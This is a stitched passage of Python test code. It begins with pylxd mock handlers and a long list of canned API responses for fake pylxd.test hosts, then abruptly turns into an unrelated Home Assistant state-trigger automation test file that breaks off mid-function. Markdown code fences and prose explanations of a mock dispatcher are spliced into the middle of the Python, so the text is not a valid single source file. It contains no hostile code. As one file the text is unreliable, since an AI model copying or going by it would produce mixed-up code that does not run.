context.status_code = 202
return json.dumps(
{"type": "sync", "operation": "/1.0/operations/operation-abc?project=default"}
)


def profile_GET(request, context):
name = request.path.split("/")[-1]
return json.dumps(
{
"type": "sync",
"metadata": {
"name": name,
"description": "An description",
"config": {},
"devices": {},
"used_by": [],
},
}
)


def profiles_POST(request, context):
context.status_code = 200
return json.dumps({"type": "sync", "metadata": {}})


def profile_DELETE(request, context):
context.status_code = 200
return json.dumps(
{"type": "sync", "operation": "/1.0/operations/operation-abc?project=default"}
)


def projects_GET(request, context):
name = request.path.split("/")[-1]
return json.dumps(
{
"type": "sync",
"metadata": {
"name": name,
"description": "new project is new",
"config": {
"features.images": "true",
},
"used_by": [],
},
}
)


def projects_POST(request, context):
context.status_code = 200
return json.dumps({"type": "sync", "metadata": {}})


def snapshot_DELETE(request, context):
context.status_code = 202
return json.dumps(
{"type": "async", "operation": "/1.0/operations/operation-abc?project=default"}
)
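# In pylxd's test suite, rules like the ones below are registered against
# a mocked requests session: each entry pairs an HTTP method and a URL
# regex with either a static body or one of the callables above. A stdlib
# sketch of how such a rule table can be dispatched (this mini-dispatcher
# is illustrative, not pylxd or requests-mock API):

```python
import json
import re


def dispatch(rules, method, url, request=None, context=None):
    """Return the response body for the first rule matching method+URL."""
    for rule in rules:
        if rule["method"] == method and re.match(rule["url"], url):
            body = rule.get("text") or rule.get("json")
            # Callable bodies compute the response from the request.
            return body(request, context) if callable(body) else body
    raise LookupError("no rule for %s %s" % (method, url))


demo_rules = [
    {
        "text": json.dumps({"type": "sync", "metadata": []}),
        "method": "GET",
        "url": r"^http://pylxd.test/1.0/instances$",
    },
]
body = dispatch(demo_rules, "GET", "http://pylxd.test/1.0/instances")
```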


RULES = [
# General service endpoints
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"auth": "trusted",
"environment": {
"certificate": "an-pem-cert",
},
"api_extensions": [],
},
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"auth": "trusted",
"environment": {},
"api_extensions": [],
},
}
),
"method": "GET",
"url": r"^http://pylxd2.test/1.0$",
},
# Certificates
{
"text": json.dumps(
{
"type": "sync",
"metadata": [
"http://pylxd.test/1.0/certificates/an-certificate",
],
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/certificates$",
},
{
"method": "POST",
"url": r"^http://pylxd.test/1.0/certificates$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"certificate": "certificate-content",
"fingerprint": "eaf55b72fc23aa516d709271df9b0116064bf8cfa009cf34c67c33ad32c2320c",
"type": "client",
},
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/certificates/eaf55b72fc23aa516d709271df9b0116064bf8cfa009cf34c67c33ad32c2320c$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"certificate": "certificate-content",
"fingerprint": "an-certificate",
"type": "client",
},
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/certificates/an-certificate$",
},
{
"json": {
"type": "sync",
"metadata": {},
},
"status_code": 202,
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/certificates/an-certificate$",
},
# Cluster
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"server_name": "an-member",
"enabled": "true",
"member_config": [
{
"entity": "storage-pool",
"name": "local",
"key": "source",
"value": "",
"description": '"source" property for storage pool "local"',
},
{
"entity": "storage-pool",
"name": "local",
"key": "volatile.initial_source",
"value": "",
"description": '"volatile.initial_source" property for'
' storage pool "local"',
},
],
},
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/cluster$",
},
# Cluster Members
{
"text": json.dumps(
{
"type": "sync",
"metadata": [
"http://pylxd.test/1.0/certificates/an-member",
"http://pylxd.test/1.0/certificates/nd-member",
],
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/cluster/members$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"server_name": "an-member",
"url": "https://10.1.1.101:8443",
"database": "false",
"status": "Online",
"message": "fully operational",
"architecture": "x86_64",
"description": "AMD Epyc 32c/64t",
"failure_domain": "rack1",
"roles": [],
},
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/cluster/members/an-member$",
},
# cluster-certificate
{
"text": json.dumps({"type": "sync", "status": "Success", "status_code": 200}),
"method": "PUT",
"url": r"^http://pylxd.test/1.0/cluster/certificate$",
},
# Instances
{
"text": json.dumps(
{
"type": "sync",
"metadata": [
"http://pylxd.test/1.0/instances/an-instance",
],
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/instances$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": [
"http://pylxd2.test/1.0/instances/an-instance",
],
}
),
"method": "GET",
"url": r"^http://pylxd2.test/1.0/instances$",
},
{
"text": instances_POST,
"method": "POST",
"url": r"^http://pylxd2.test/1.0/instances$",
},
{
"text": instances_POST,
"method": "POST",
"url": r"^http://pylxd.test/1.0/instances$",
},
{
"text": instances_POST,
"method": "POST",
"url": r"^http://pylxd.test/1.0/instances\?target=an-remote",
},
{
"json": {
"type": "sync",
"metadata": {
"name": "an-instance",
"architecture": "x86_64",
"config": {
"security.privileged": "true",
},
"created_at": "1983-06-16T00:00:00-00:00",
"last_used_at": "1983-06-16T00:00:00-00:00",
"description": "Some description",
"devices": {"root": {"path": "/", "type": "disk"}},
"ephemeral": True,
"expanded_config": {
"security.privileged": "true",
},
"expanded_devices": {
"eth0": {
"name": "eth0",
"nictype": "bridged",
"parent": "lxdbr0",
"type": "nic",
},
"root": {"path": "/", "type": "disk"},
},
"profiles": ["default"],
"stateful": False,
"status": "Running",
"status_code": 103,
"unsupportedbypylxd": (
"This attribute is not supported by "
"pylxd. We want to test whether the mere presence of it "
"makes it crash."
),
},
},
"method": "GET",
"url": r"^http://pylxd2.test/1.0/instances/an-instance$",
},
{
"json": {
"type": "sync",
"metadata": {
"name": "an-instance",
"architecture": "x86_64",
"config": {
"security.privileged": "true",
},
"created_at": "1983-06-16T00:00:00-00:00",
"last_used_at": "1983-06-16T00:00:00-00:00",
"description": "Some description",
"devices": {"root": {"path": "/", "type": "disk"}},
"ephemeral": True,
"expanded_config": {
"security.privileged": "true",
},
"expanded_devices": {
"eth0": {
"name": "eth0",
"nictype": "bridged",
"parent": "lxdbr0",
"type": "nic",
},
"root": {"path": "/", "type": "disk"},
},
"profiles": ["default"],
"stateful": False,
"status": "Running",
"status_code": 103,
"unsupportedbypylxd": (
"This attribute is not supported by "
"pylxd. We want to test whether the mere presence of it "
"makes it crash."
),
},
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/instances/an-instance$",
},
{
"json": {
"type": "sync",
"metadata": {
"status": "Running",
"status_code": 103,
"disk": {
"root": {
"usage": 10,
}
},
"memory": {
"usage": 15,
"usage_peak": 20,
"swap_usage": 0,
"swap_usage_peak": 5,
},
"network": {
"l0": {
"addresses": [
{
"family": "inet",
"address": "127.0.0.1",
"netmask": "8",
"scope": "local",
}
],
}
},
"pid": 69,
"processes": 100,
},
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/instances/an-instance/state$",
},
{
"json": {
"type": "sync",
"metadata": {
"name": "an-new-remote-instance",
"architecture": "x86_64",
"config": {
"security.privileged": "true",
},
"created_at": "1983-06-16T00:00:00-00:00",
"last_used_at": "1983-06-16T00:00:00-00:00",
"description": "Some description",
"location": "an-remote",
"status": "Running",
"status_code": 103,
"unsupportedbypylxd": (
"This attribute is not supported by "
"pylxd. We want to test whether the mere presence of it "
"makes it crash."
),
},
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/instances/an-new-remote-instance$",
},
{
"status_code": 202,
"json": {
"type": "async",
"operation": "/1.0/operations/operation-abc?project=default",
},
"method": "PUT",
"url": r"^http://pylxd.test/1.0/instances/an-instance/state$",
},
{
"json": instance_POST,
"method": "POST",
"url": r"^http://pylxd.test/1.0/instances/an-instance$",
},
{
"text": json.dumps(
{
"type": "async",
"operation": "/1.0/operations/operation-abc?project=default",
}
),
"status_code": 202,
"method": "PUT",
"url": r"^http://pylxd.test/1.0/instances/an-instance$",
},
{
"text": instance_DELETE,
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/instances/an-instance$",
},
{
"json": {
"type": "async",
"metadata": {
"metadata": {
"fds": {
"0": "abc",
"1": "def",
"2": "ghi",
"control": "jkl",
}
},
},
"operation": "/1.0/operations/operation-abc?project=default",
},
"status_code": 202,
"method": "POST",
"url": r"^http://pylxd.test/1.0/instances/an-instance/exec$",
},
{
"json": instance_PUT,
"method": "PUT",
"url": r"^http://pylxd.test/1.0/instances/an-instance$",
},
# Instance Snapshots
{
"text": json.dumps(
{
"type": "sync",
"metadata": [
"/1.0/instances/an_instance/snapshots/an-snapshot",
],
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/instances/an-instance/snapshots$",
},
{
"text": json.dumps(
{
"type": "async",
"operation": "/1.0/operations/operation-abc?project=default",
}
),
"status_code": 202,
"method": "POST",
"url": r"^http://pylxd.test/1.0/instances/an-instance/snapshots$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"name": "an_instance/an-snapshot",
"stateful": False,
},
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/instances/an-instance/snapshots/an-snapshot$",
},
{
"text": json.dumps(
{
"type": "async",
"operation": "/1.0/operations/operation-abc?project=default",
}
),
"status_code": 202,
"method": "POST",
"url": r"^http://pylxd.test/1.0/instances/an-instance/snapshots/an-snapshot$",
},
{
"text": snapshot_DELETE,
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/instances/an-instance/snapshots/an-snapshot$",
},
# Instance files
{
"text": "This is a getted file",
"method": "GET",
"url": r"^http://pylxd.test/1.0/instances/an-instance/files\?path=%2Ftmp%2Fgetted$",
},
{
"text": '{"some": "value"}',
"method": "GET",
"url": r"^http://pylxd.test/1.0/instances/an-instance/files\?path=%2Ftmp%2Fjson-get$",
},
{
"method": "POST",
"url": r"^http://pylxd.test/1.0/instances/an-instance/files\?path=%2Ftmp%2Fputted$",
},
{
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/instances/an-instance/files\?path=%2Ftmp%2Fputted$",
},
# Images
{
"text": json.dumps(
{
"type": "sync",
"metadata": [
"http://pylxd.test/1.0/images/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
],
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/images$",
},
{
"text": images_POST,
"method": "POST",
"url": r"^http://pylxd.test/1.0/images$",
},
{
"text": images_POST,
"method": "POST",
"url": r"^http://pylxd2.test/1.0/images$",
},
{
"json": {
"type": "sync",
"status": "Success",
"status_code": 200,
"metadata": {
"name": "an-alias",
"description": "an-alias",
"target": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
},
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/images/aliases/an-alias$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"aliases": [
{
"name": "an-alias",
"fingerprint": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
}
],
"architecture": "x86_64",
"cached": False,
"filename": "a_image.tar.bz2",
"fingerprint": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
"public": False,
"properties": {},
"size": 1,
"auto_update": False,
"created_at": "1983-06-16T02:42:00Z",
"expires_at": "1983-06-16T02:42:00Z",
"last_used_at": "1983-06-16T02:42:00Z",
"uploaded_at": "1983-06-16T02:42:00Z",
},
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/images/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"aliases": [
{
"name": "an-alias",
"fingerprint": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
}
],
"architecture": "x86_64",
"cached": False,
"filename": "a_image.tar.bz2",
"fingerprint": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
"public": False,
"properties": {},
"size": 1,
"auto_update": False,
"created_at": "1983-06-16T02:42:00Z",
"expires_at": "1983-06-16T02:42:00Z",
"last_used_at": "1983-06-16T02:42:00Z",
"uploaded_at": "1983-06-16T02:42:00Z",
},
}
),
"method": "GET",
"url": r"^http://pylxd2.test/1.0/images/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855$",
},
{
"text": json.dumps(
{
"type": "async",
"operation": "/1.0/operations/operation-abc?project=default",
}
),
"status_code": 202,
"method": "PUT",
"url": r"^http://pylxd.test/1.0/images/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855$",
},
{
"text": "0" * 2048,
"method": "GET",
"url": r"^http://pylxd.test/1.0/images/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855/export$",
},
{
"text": image_DELETE,
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/images/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855$",
},
# Image Aliases
{
"json": {
"type": "sync",
"status": "Success",
"status_code": 200,
"metadata": {
"name": "an-alias",
"description": "an-alias",
"target": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
},
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/images/aliases/an-alias$",
},
{
"json": {"type": "sync", "status": "Success", "metadata": None},
"method": "POST",
"url": r"^http://pylxd.test/1.0/images/aliases$",
},
{
"json": {
"type": "sync",
"status": "Success",
"status_code": 200,
"metadata": None,
},
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/images/aliases/an-alias$",
},
{
"json": {
"type": "sync",
"status": "Success",
"status_code": 200,
"metadata": None,
},
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/images/aliases/b-alias$",
},
# Images secret
{
"json": {
"type": "sync",
"status": "Success",
"status_code": 200,
"metadata": {"metadata": {"secret": "abcdefg"}},
},
"method": "POST",
"url": r"^http://pylxd.test/1.0/images/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855/secret$",
},
# Networks
{
"json": {
"type": "sync",
"metadata": [
"http://pylxd.test/1.0/networks/lo",
"http://pylxd.test/1.0/networks/eth0",
],
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/networks$",
},
{
"text": networks_POST,
"method": "POST",
"url": r"^http://pylxd.test/1.0/networks$",
},
{
"json": {
"type": "sync",
"metadata": {
"name": "lo",
"type": "loopback",
"used_by": [],
},
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/networks/lo$",
},
{
"text": networks_GET,
"method": "GET",
"url": r"^http://pylxd.test/1.0/networks/eth(0|1|2)$",
},
{
"text": json.dumps({"type": "sync"}),
"method": "PUT",
"url": r"^http://pylxd.test/1.0/networks/eth0$",
},
{
"text": networks_DELETE,
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/networks/eth0$",
},
# Storage Pools
{
"json": {
"type": "sync",
"metadata": [
"http://pylxd.test/1.0/storage-pools/lxd",
],
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/storage-pools$",
},
{
"json": {
"type": "sync",
"metadata": {
"config": {"size": "0", "source": "/var/lib/lxd/disks/lxd.img"},
"description": "",
"name": "lxd",
"driver": "zfs",
"used_by": [],
},
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd$",
},
{
"json": {"type": "sync"},
"method": "POST",
"url": r"^http://pylxd.test/1.0/storage-pools$",
},
{
"json": {"type": "sync"},
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd$",
},
{
"json": {"type": "sync"},
"method": "PUT",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd$",
},
{
"json": {"type": "sync"},
"method": "PATCH",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd$",
},
# Storage Resources
{
"json": {
"type": "sync",
"metadata": {
"space": {"used": 207111192576, "total": 306027577344},
"inodes": {"used": 3275333, "total": 18989056},
},
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd/resources$",
},
# Storage Volumes
{
"json": {
"type": "sync",
"metadata": [
"/1.0/storage-pools/default/volumes/instance/c1",
"/1.0/storage-pools/default/volumes/instance/c2",
"/1.0/storage-pools/default/volumes/container/c3",
"/1.0/storage-pools/default/volumes/container/c4",
"/1.0/storage-pools/default/volumes/virtual-machine/vm1",
"/1.0/storage-pools/default/volumes/virtual-machine/vm2",
"/1.0/storage-pools/default/volumes/image/i1",
"/1.0/storage-pools/default/volumes/image/i2",
"/1.0/storage-pools/default/volumes/custom/cu1",
],
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd/volumes$",
},
# create a sync storage volume
{
"json": {"type": "sync"},
"method": "POST",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd/volumes/custom$",
},
{
"json": {
"type": "sync",
"status": "Success",
"status_code": 200,
"error_code": 0,
"error": "",
"metadata": {
"type": "custom",
"used_by": [],
"name": "cu1",
"config": {
"block.filesystem": "ext4",
"block.mount_options": "discard",
"size": "10737418240",
},
},
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd/volumes/custom/cu1$",
},
# create an async storage volume
{
"json": {
"type": "async",
"operation": "/1.0/operations/operation-abc?project=default",
},
"status_code": 202,
"method": "POST",
"url": (r"^http://pylxd.test/1.0/storage-pools/" "async-lxd/volumes/custom$"),
},
{
"json": {
"type": "sync",
"status": "Success",
"status_code": 200,
"error_code": 0,
"error": "",
"metadata": {
"type": "custom",
"used_by": [],
"name": "cu1",
"config": {
"block.filesystem": "ext4",
"block.mount_options": "discard",
"size": "10737418240",
},
},
},
"method": "GET",
"url": (
r"^http://pylxd.test/1.0/storage-pools/" "async-lxd/volumes/custom/cu1$"
),
},
# rename a storage volume, sync
{
"json": {
"type": "sync",
"metadata": {"control": "secret1", "fs": "secret2"},
},
"method": "POST",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd/volumes/custom/cu1$",
},
# rename a storage volume, async
{
"json": {
"type": "async",
"operation": "/1.0/operations/operation-abc?project=default",
"metadata": {"control": "secret1", "fs": "secret2"},
},
"method": "POST",
"status_code": 202,
"url": (
r"^http://pylxd.test/1.0/storage-pools/" "async-lxd/volumes/custom/cu1$"
),
},
{
"json": {"type": "sync"},
"method": "PUT",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd/volumes/custom/cu1$",
},
{
"json": {"type": "sync"},
"method": "PATCH",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd/volumes/custom/cu1$",
},
{
"json": {"type": "sync"},
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd/volumes/custom/cu1$",
},
# Profiles
{
"text": json.dumps(
{
"type": "sync",
"metadata": [
"http://pylxd.test/1.0/profiles/an-profile",
],
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/profiles$",
},
{
"text": profiles_POST,
"method": "POST",
"url": r"^http://pylxd.test/1.0/profiles$",
},
{
"text": profile_GET,
"method": "GET",
"url": r"^http://pylxd.test/1.0/profiles/(an-profile|an-new-profile|an-renamed-profile)$",
},
{
"text": json.dumps({"type": "sync"}),
"method": "PUT",
"url": r"^http://pylxd.test/1.0/profiles/(an-profile|an-new-profile)$",
},
{
"text": json.dumps({"type": "sync"}),
"method": "POST",
"url": r"^http://pylxd.test/1.0/profiles/(an-profile|an-new-profile)$",
},
{
"text": profile_DELETE,
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/profiles/(an-profile|an-new-profile)$",
},
# Projects
{
"text": json.dumps(
{
"type": "sync",
"metadata": [
"http://pylxd.test/1.0/projects/test-project",
],
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/projects$",
},
{
"text": projects_GET,
"method": "GET",
"url": r"^http://pylxd.test/1.0/projects/(test-project|new-project)$",
},
{
"text": projects_POST,
"method": "POST",
"url": r"^http://pylxd.test/1.0/projects$",
},
{
"text": json.dumps({"type": "sync"}),
"method": "PUT",
"url": r"^http://pylxd.test/1.0/projects/(test-project)$",
},
{
"text": json.dumps({"type": "sync"}),
"method": "POST",
"url": r"^http://pylxd.test/1.0/projects/(new-project)$",
},
{
"text": profile_DELETE,
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/projects/(test-project)$",
},
# Operations
{
"text": json.dumps(
{
"type": "sync",
"metadata": {"id": "operation-abc", "metadata": {"return": 0}},
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/operations/operation-abc$",
},
{
"text": json.dumps(
{
"type": "sync",
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/operations/operation-abc/wait$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {"id": "operation-abc"},
}
),
"method": "GET",
"url": r"^http://pylxd2.test/1.0/operations/operation-abc$",
},
{
"text": json.dumps(
{
"type": "sync",
}
),
"method": "GET",
"url": r"^http://pylxd2.test/1.0/operations/operation-abc/wait$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"id": "images-create-operation",
"metadata": {
"fingerprint": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
},
},
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/operations/images-create-operation$",
},
{
"text": json.dumps(
{
"type": "sync",
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/operations/images-create-operation/wait$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {"id": "operation-abc"},
}
),
"method": "GET",
"url": r"^http://pylxd2.test/1.0/operations/images-create-operation$",
},
{
"text": json.dumps(
{
"type": "sync",
}
),
"method": "GET",
"url": r"^http://pylxd2.test/1.0/operations/images-create-operation/wait$",
},
]
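A rule list like the one above can be exercised with a small dispatcher that pairs an HTTP method and a URL regex with a canned response body. The sketch below is illustrative only; the names `RULES` and `dispatch` are assumptions, not part of pylxd's actual test helpers.

```python
# Minimal sketch of dispatching mock rules like those above.
# RULES and dispatch() are illustrative names, not pylxd test helpers.
import json
import re

RULES = [
    {
        "json": {"type": "sync", "metadata": {"name": "lo", "type": "loopback", "used_by": []}},
        "method": "GET",
        "url": r"^http://pylxd.test/1.0/networks/lo$",
    },
    {
        "text": json.dumps({"type": "sync"}),
        "method": "PUT",
        "url": r"^http://pylxd.test/1.0/networks/eth0$",
    },
]


def dispatch(method, url):
    """Return the canned body of the first rule matching method and URL."""
    for rule in RULES:
        if rule["method"] == method and re.match(rule["url"], url):
            # "json" rules carry a parsed body; "text" rules a serialized one.
            return rule["json"] if "json" in rule else rule["text"]
    raise LookupError(f"no mock rule for {method} {url}")
```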
"""The test for state automation."""
from datetime import timedelta
import pytest
import homeassistant.components.automation as automation
from homeassistant.components.homeassistant.triggers import state as state_trigger
from homeassistant.core import Context
from homeassistant.setup import async_setup_component
import homeassistant.util.dt as dt_util
from tests.async_mock import patch
from tests.common import (
assert_setup_component,
async_fire_time_changed,
async_mock_service,
mock_component,
)
from tests.components.automation import common
@pytest.fixture
def calls(hass):
"""Track calls to a mock service."""
return async_mock_service(hass, "test", "automation")
@pytest.fixture(autouse=True)
def setup_comp(hass):
"""Initialize components."""
mock_component(hass, "group")
hass.states.async_set("test.entity", "hello")
async def test_if_fires_on_entity_change(hass, calls):
"""Test for firing on entity change."""
context = Context()
hass.states.async_set("test.entity", "hello")
await hass.async_block_till_done()
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "state", "entity_id": "test.entity"},
"action": {
"service": "test.automation",
"data_template": {
"some": "{{ trigger.%s }}"
% "}} - {{ trigger.".join(
(
"platform",
"entity_id",
"from_state.state",
"to_state.state",
"for",
)
)
},
},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world", context=context)
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].context.parent_id == context.id
assert calls[0].data["some"] == "state - test.entity - hello - world - None"
await common.async_turn_off(hass)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "planet")
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_entity_change_with_from_filter(hass, calls):
"""Test for firing on entity change with filter."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"from": "hello",
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_entity_change_with_to_filter(hass, calls):
"""Test for firing on entity change with no filter."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_attribute_change_with_to_filter(hass, calls):
"""Test for not firing on attribute change."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world", {"test_attribute": 11})
hass.states.async_set("test.entity", "world", {"test_attribute": 12})
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_entity_change_with_both_filters(hass, calls):
"""Test for firing if both filters are a non match."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"from": "hello",
"to": "world",
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_not_fires_if_to_filter_not_match(hass, calls):
"""Test for not firing if to filter is not a match."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"from": "hello",
"to": "world",
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "moon")
await hass.async_block_till_done()
assert len(calls) == 0
async def test_if_not_fires_if_from_filter_not_match(hass, calls):
"""Test for not firing if from filter is not a match."""
hass.states.async_set("test.entity", "bye")
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"from": "hello",
"to": "world",
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert len(calls) == 0
async def test_if_not_fires_if_entity_not_match(hass, calls):
"""Test for not firing if entity is not matching."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "state", "entity_id": "test.another_entity"},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert len(calls) == 0
async def test_if_action(hass, calls):
"""Test for to action."""
entity_id = "domain.test_entity"
test_state = "new_state"
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": [
{"condition": "state", "entity_id": entity_id, "state": test_state}
],
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set(entity_id, test_state)
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
hass.states.async_set(entity_id, test_state + "something")
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fails_setup_if_to_boolean_value(hass, calls):
"""Test for setup failure for boolean to."""
with assert_setup_component(0, automation.DOMAIN):
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": True,
},
"action": {"service": "homeassistant.turn_on"},
}
},
)
async def test_if_fails_setup_if_from_boolean_value(hass, calls):
"""Test for setup failure for boolean from."""
with assert_setup_component(0, automation.DOMAIN):
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"from": True,
},
"action": {"service": "homeassistant.turn_on"},
}
},
)
async def test_if_fails_setup_bad_for(hass, calls):
"""Test for setup failure for bad for."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
"for": {"invalid": 5},
},
"action": {"service": "homeassistant.turn_on"},
}
},
)
with patch.object(state_trigger, "_LOGGER") as mock_logger:
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert mock_logger.error.called
async def test_if_fails_setup_for_without_to(hass, calls):
"""Test for setup failures for missing to."""
with assert_setup_component(0, automation.DOMAIN):
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"for": {"seconds": 5},
},
"action": {"service": "homeassistant.turn_on"},
}
},
)
async def test_if_not_fires_on_entity_change_with_for(hass, calls):
"""Test for not firing on entity change with for."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
"for": {"seconds": 5},
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
hass.states.async_set("test.entity", "not_world")
await hass.async_block_till_done()
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 0
async def test_if_not_fires_on_entities_change_with_for_after_stop(hass, calls):
"""Test for not firing on entity change with for after stop trigger."""
assert await async_setup_component(
